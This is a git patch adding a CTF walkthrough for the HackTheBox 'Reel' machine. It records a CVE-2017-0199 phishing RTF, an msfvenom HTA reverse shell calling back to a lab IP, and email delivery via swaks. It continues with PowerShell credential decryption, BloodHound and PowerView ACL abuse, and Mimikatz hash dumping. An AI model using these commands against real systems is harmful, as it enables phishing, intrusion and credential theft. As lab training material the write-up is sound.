From eb3d84102aebe1862a10028de120c0b688187c34 Mon Sep 17 00:00:00 2001 From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com> Date: Sun, 9 Jan 2022 05:02:24 +0500 Subject: [PATCH] Create Reel.md --- HackTheBox/Reel.md | 248 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 248 insertions(+) create mode 100644 HackTheBox/Reel.md diff --git a/HackTheBox/Reel.md b/HackTheBox/Reel.md new file mode 100644 index 0000000..c2dcea4 --- /dev/null +++ b/HackTheBox/Reel.md @@ -0,0 +1,248 @@ +# HackTheBox-Reel + +## NMAP + +```bash + +PORT STATE SERVICE VERSION +21/tcp open ftp Microsoft ftpd +| ftp-anon: Anonymous FTP login allowed (FTP code 230) +|_05-28-18 11:19PM documents +| ftp-syst: +|_ SYST: Windows_NT +22/tcp open ssh OpenSSH 7.6 (protocol 2.0) +| ssh-hostkey: +| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA) +| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA) +|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519) +25/tcp open smtp? +| fingerprint-strings: +| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLS +SessionReq, X11Probe: +| 220 Mail Service ready +| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: +| 220 Mail Service ready +| sequence of commands +| sequence of commands +| Hello: +| 220 Mail Service ready +| EHLO Invalid domain address. +| Help: +| 220 Mail Service ready +| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY\ +| SIPOptions: +| 220 Mail Service ready +| sequence of commands +| sequence of commands +| sequence of commands +| sequence of commands +| sequence of commands +| sequence of commands +``` + +## PORT 21 (FTP) + +FTP has anonymous login enabled so we can easily login + + + +We see a folder named `documents` + + + +And in the folder we can see three files + + + + + +Opening the `Applocker.docx` file it tell about making rules for some scripts + + + +Opening `Windows Event Forwarding.docx` will warn us having a macro in it and will fail to recover document + + + +Lastly the text file has this conent in it + +``` +Please email me any rtf format procedures - I'll review and convert. +new format / converted documents will be saved here. +``` + +So from this file it pretty much tells that we need to make a phishing rtf document and send it through mail but the question is send to whom ? We don't have any smb or ldap service which we can try to enumerate users from only smtp service is from where which can enumerate users but we do need a user first so running `exiftool` on word documents we get a username + + + + +## PORT 25 (SMTP) + +To check if it's a correct email addres we can use `VRFY` to check but that command is not allowed in this smtp server + + + +Instead we can use `RCPT` to check if the email address is valid + + + +And `nico@megabank.com` is a valid address on which we can send an email , now to send a rtf file windows had a CVE related to rtf which can allow remote commands to be executed which was given a CVE `CVE-2017-0199` + + +http://rewtin.blogspot.com/2017/04/cve-2017-0199-practical-exploitation-poc.html + + +## Foothold + +Using an exploit from github we can craft a rtf in which we are going to include a url that will fetch hta file and it will execute on the system to give us a reverse shell for that we need to genrate a hta file using `msfvenom` + +```bash +sfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=2222 -f hta-psh +> abc.hta +``` + +```bash +python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://10.1 +0.14.17/abc.hta +``` + + + +Now to send the mail with the attachment , I was having difficulty to figure out to send it , on goolge every mentioned doing it through telnet by specifiying content-type and other headers but I found a neat tool called `sawks` + +http://www.jetmore.org/john/code/swaks/ + +So running this to send an email to `nico` and starting the python server to hosts the hta file + + + + + + +```bash +swaks --server 10.10.10.77 -f arz@htb.reel -t nico@megbank.com --attach Invoice.rtf +``` + + + +In `nico`'s directory in `Desktop` folder we can see a `cred.xml` file, reading that file it seems that there's an encrpyted password for `Tom` + + + +## Privilege Escalation (Tom) + +Now here I ran into an issue to decrpyt this we need powershell and when I ran powershell the reverse shell would just hang + + + +So we can just pass arguemnts to powershell and decrypt the password for user `Tom` + +```powershell +powershell.exe -c "$file = Import-Clixml -Path cred.xml;$file.GetNetworkCredential().Password" +``` + + + +Now that we have credentials for tom user we can use ssh to login + + + +Checking which groups this user is in + + + +In the Desktop directory we see a folder `AD Audit` which already has bloodhound folder in it + + + + + +And from the text file it seems that no path is there to domain admin + + + +We can import and run `PowerView` commands but I am just more comfortable with using bloodhound but we can't actually import sharphound script from the machine + + + +## Privilege Escalation (Claire) + +So we can bypass this by loading the script in the memory through `IEX` which downloads the script and loads it into the memory + + + +```powershell +`Invoke-Bloodhound -CollectionMethod All -Domain HTB.LOCAL -ZipFileName loot.zip` +``` + + + +To transfer this we can use impacket's smbserver to copy the zip file onto our machine + + + + + +After this is transferred we can use bloodhound GUI to see what we can abuse in AD + + + +We have `WriteOwner` access on claire object so we can own this object and give `All` rights on this object in order to reset password + +```powershell +Set-DomainObjectOwner -Identity claire -OwnerIdentity tom -Verbose +``` + + + +```powershell +Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights All -Verbose +``` + + + + + + + +## Privilege Escalation (Administrator) + +Now through `Claire` we can see that we have `WriteDacl` on `BACKUP_ADMINS` + + + + + +We can see the absue that we can add users to this group + + + +So logging in back with tom we see that we are a member of this group now + + + +But it gets reverted quickly so we need to be quick in navigating to `Administrators` folder and there we will find some backup scripts out which `BackupScript.ps1` has a password for administrator account + + + + + +Having the password we can login through ssh + + + +Further loading `Mimikatz` we can dump SAM hashes + + + + + +## References + +- https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum +- https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication +- https://github.com/bhdresh/CVE-2017-0199 +- https://linux.die.net/man/1/swaks +- http://www.jetmore.org/john/code/swaks/ +- https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx +- https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993